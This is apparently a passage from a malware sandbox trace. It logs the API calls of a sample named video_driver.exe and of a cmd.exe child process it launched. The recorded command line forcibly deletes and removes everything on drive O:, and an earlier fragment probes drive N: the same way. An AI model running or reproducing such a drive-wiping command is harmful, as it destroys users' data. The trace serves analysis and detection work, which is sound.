Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0064.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0064.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0064.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0064.559] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0064.559] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0064.559] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0064.560] GetProcessHeap () returned 0x410000 [0064.560] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20c) returned 0x422ef8 [0064.560] GetConsoleTitleW (in: lpConsoleTitle=0x422ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0064.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.562] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0064.562] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0064.563] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0064.563] GetProcessHeap () returned 0x410000 [0064.563] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x426ae0 [0064.563] GetProcessHeap () returned 0x410000 [0064.563] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x42aaf8 [0064.564] GetProcessHeap () returned 0x410000 [0064.564] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1a) returned 0x4257e0 [0064.564] GetEnvironmentVariableW (in: lpName="p IN (\"N", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="CD") returned 13 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="ERRORLEVEL") returned 11 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="CMDEXTVERSION") returned 13 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="CMDCMDLINE") returned 13 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="DATE") returned 12 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="TIME") returned -4 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="RANDOM") returned -2 [0064.564] _wcsicmp (_String1="p IN (\"N", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.564] GetProcessHeap () returned 0x410000 [0064.564] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4257e0 | out: hHeap=0x410000) returned 1 [0064.564] GetProcessHeap () returned 0x410000 [0064.564] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42aaf8 | out: hHeap=0x410000) returned 1 [0064.564] GetProcessHeap () returned 0x410000 [0064.564] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x42aaf8 [0064.564] GetProcessHeap () returned 0x410000 [0064.564] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42aaf8 | out: hHeap=0x410000) returned 1 [0064.564] GetProcessHeap () returned 0x410000 [0064.565] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426ae0 | out: hHeap=0x410000) returned 1 [0064.565] _wcsicmp (_String1="if", _String2=")") returned 64 [0064.565] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0064.565] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0064.565] _wcsicmp (_String1="IF", _String2="if") returned 0 [0064.565] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0064.565] GetProcessHeap () returned 0x410000 [0064.565] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423110 [0064.565] GetProcessHeap () returned 0x410000 [0064.565] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x41ffc0 [0064.566] GetProcessHeap () returned 0x410000 [0064.566] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x20) returned 0x4257e0 [0064.566] GetProcessHeap () returned 0x410000 [0064.566] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4257e0, Size=0x16) returned 0x421800 [0064.566] GetProcessHeap () returned 0x410000 [0064.566] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x421800) returned 0x16 [0064.566] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0064.567] GetProcessHeap () returned 0x410000 [0064.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423170 [0064.567] GetProcessHeap () returned 0x410000 [0064.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x4231d0 [0064.567] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0064.567] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0064.568] GetProcessHeap () returned 0x410000 [0064.568] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 0x4231f0 [0064.568] GetProcessHeap () returned 0x410000 [0064.568] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x4257e0 [0064.568] GetProcessHeap () returned 0x410000 [0064.568] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4257e0, Size=0x14) returned 0x423210 [0064.568] GetProcessHeap () returned 0x410000 [0064.568] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x423210) returned 0x14 [0064.568] _wcsicmp (_String1="del", _String2=")") returned 59 [0064.568] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0064.568] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0064.568] _wcsicmp (_String1="IF", _String2="del") returned 5 [0064.568] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0064.568] _wcsicmp (_String1="REM", _String2="del") returned 14 [0064.568] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0064.568] GetProcessHeap () returned 0x410000 [0064.568] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423230 [0064.568] GetProcessHeap () returned 0x410000 [0064.569] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x41ffd8 [0064.569] GetProcessHeap () returned 0x410000 [0064.569] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x423290 [0064.570] GetProcessHeap () returned 0x410000 [0064.570] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x4232c0 [0064.570] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0064.570] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0064.570] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0064.570] GetProcessHeap () returned 0x410000 [0064.570] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423320 [0064.570] GetProcessHeap () returned 0x410000 [0064.570] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x44) returned 0x423380 [0064.571] GetProcessHeap () returned 0x410000 [0064.571] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x4233d0 [0064.571] GetProcessHeap () returned 0x410000 [0064.571] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4233d0, Size=0x12) returned 0x4233d0 [0064.571] GetProcessHeap () returned 0x410000 [0064.571] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4233d0) returned 0x12 [0064.571] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0064.571] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0064.572] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0064.572] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0064.572] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0064.572] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0064.572] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0064.573] GetProcessHeap () returned 0x410000 [0064.573] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 0x4233f0 [0064.573] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0064.574] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0064.574] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0064.574] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0064.574] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0064.574] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0064.574] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0064.574] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0064.574] GetProcessHeap () returned 0x410000 [0064.574] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x423410 [0064.574] GetProcessHeap () returned 0x410000 [0064.574] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x423470 [0064.574] GetProcessHeap () returned 0x410000 [0064.575] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x20) returned 0x4257e0 [0064.576] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0064.578] GetFullPathNameW (in: lpFileName="N:", nBufferLength=0x208, lpBuffer=0x28f310, lpFilePart=0x28f0bc | out: lpBuffer="N:\\", lpFilePart=0x28f0bc*=0x0) returned 0x3 [0064.578] wcsncmp (_String1="N:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -14 [0064.583] GetFileAttributesW (lpFileName="N:\\" (normalized: "n:")) returned 0xffffffff [0064.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.584] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.584] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.584] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.584] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.584] SetConsoleInputExeNameW () returned 0x1 [0064.584] GetConsoleOutputCP () returned 0x1b5 [0064.585] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.585] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.585] exit (_Code=0) Process: id = "35" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41b0e000" os_pid = "0xb94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN (\"O:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 63 os_tid = 0xb00 [0064.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fb14 | out: lpSystemTimeAsFileTime=0x32fb14*(dwLowDateTime=0x45ea600, dwHighDateTime=0x1d62400)) [0064.682] GetCurrentProcessId () returned 0xb94 [0064.682] GetCurrentThreadId () returned 0xb00 [0064.682] GetTickCount () returned 0x11479d2 [0064.682] QueryPerformanceCounter (in: lpPerformanceCount=0x32fb0c | out: lpPerformanceCount=0x32fb0c*=18481558289) returned 1 [0064.685] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0064.685] __set_app_type (_Type=0x1) [0064.685] __p__fmode () returned 0x770331f4 [0064.685] __p__commode () returned 0x770331fc [0064.685] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0064.685] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0064.685] GetCurrentThreadId () returned 0xb00 [0064.685] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb00) returned 0x60 [0064.686] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.686] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0064.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.686] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0064.686] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32faa4 | out: phkResult=0x32faa4*=0x0) returned 0x2 [0064.687] VirtualQuery (in: lpAddress=0x32fadb, lpBuffer=0x32fa74, dwLength=0x1c | out: lpBuffer=0x32fa74*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.687] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32fa74, dwLength=0x1c | out: lpBuffer=0x32fa74*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0064.687] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32fa74, dwLength=0x1c | out: lpBuffer=0x32fa74*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0064.687] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32fa74, dwLength=0x1c | out: lpBuffer=0x32fa74*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.687] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32fa74, dwLength=0x1c | out: lpBuffer=0x32fa74*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0064.687] GetConsoleOutputCP () returned 0x1b5 [0064.687] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.688] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0064.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.688] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0064.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.688] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.688] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.689] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.689] GetEnvironmentStringsW () returned 0x5020f8* [0064.689] GetProcessHeap () returned 0x4f0000 [0064.689] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x502bd0 [0064.689] FreeEnvironmentStringsW (penv=0x5020f8) returned 1 [0064.690] GetProcessHeap () returned 0x4f0000 [0064.690] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4) returned 0x501898 [0064.690] GetEnvironmentStringsW () returned 0x5020f8* [0064.690] GetProcessHeap () returned 0x4f0000 [0064.690] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xaca) returned 0x5036a8 [0064.690] FreeEnvironmentStringsW (penv=0x5020f8) returned 1 [0064.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ea14 | out: phkResult=0x32ea14*=0x68) returned 0x0 [0064.690] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x0, lpData=0x32ea20*=0x0, lpcbData=0x32ea18*=0x1000) returned 0x2 [0064.690] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x1, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.690] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x0, lpData=0x32ea20*=0x1, lpcbData=0x32ea18*=0x1000) returned 0x2 [0064.690] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x0, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.690] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x40, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x40, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x0, lpData=0x32ea20*=0x40, lpcbData=0x32ea18*=0x1000) returned 0x2 [0064.691] RegCloseKey (hKey=0x68) returned 0x0 [0064.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ea14 | out: phkResult=0x32ea14*=0x68) returned 0x0 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x0, lpData=0x32ea20*=0x40, lpcbData=0x32ea18*=0x1000) returned 0x2 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x1, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x0, lpData=0x32ea20*=0x1, lpcbData=0x32ea18*=0x1000) returned 0x2 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x0, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x9, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x4, lpData=0x32ea20*=0x9, lpcbData=0x32ea18*=0x4) returned 0x0 [0064.691] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32ea1c, lpData=0x32ea20, lpcbData=0x32ea18*=0x1000 | out: lpType=0x32ea1c*=0x0, lpData=0x32ea20*=0x9, lpcbData=0x32ea18*=0x1000) returned 0x2 [0064.691] RegCloseKey (hKey=0x68) returned 0x0 [0064.691] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6a [0064.692] srand (_Seed=0x5eb34b6a) [0064.692] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN (\"O:\") DO rmdir \"%p\" /s /q" [0064.692] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"O:\" del /f /s /q \"O:\" & FOR /D %p IN (\"O:\") DO rmdir \"%p\" /s /q" [0064.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.692] GetProcessHeap () returned 0x4f0000 [0064.692] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x5020f8 [0064.692] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x502100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0064.692] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0064.692] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0064.693] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.693] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0064.693] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0064.693] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0064.693] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0064.693] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0064.693] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0064.693] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0064.693] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.693] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0064.693] GetProcessHeap () returned 0x4f0000 [0064.693] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x502bd0 | out: hHeap=0x4f0000) returned 1 [0064.693] GetEnvironmentStringsW () returned 0x502310* [0064.693] GetProcessHeap () returned 0x4f0000 [0064.693] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xae2) returned 0x504c70 [0064.694] FreeEnvironmentStringsW (penv=0x502310) returned 1 [0064.694] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0064.694] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.694] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0064.694] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0064.694] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0064.694] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0064.694] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0064.694] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0064.694] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0064.694] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0064.694] GetProcessHeap () returned 0x4f0000 [0064.694] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x5017c8 [0064.694] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f7e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f7e0, lpFilePart=0x32f7dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f7dc*="Desktop") returned 0x25 [0064.694] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.694] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f55c | out: lpFindFileData=0x32f55c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x505760 [0064.695] FindClose (in: hFindFile=0x505760 | out: hFindFile=0x505760) returned 1 [0064.695] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f55c | out: lpFindFileData=0x32f55c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x505760 [0064.695] FindClose (in: hFindFile=0x505760 | out: hFindFile=0x505760) returned 1 [0064.695] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0064.695] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f55c | out: lpFindFileData=0x32f55c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x505760 [0064.695] FindClose (in: hFindFile=0x505760 | out: hFindFile=0x505760) returned 1 [0064.695] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.695] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0064.695] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0064.695] GetProcessHeap () returned 0x4f0000 [0064.695] HeapFree (in: 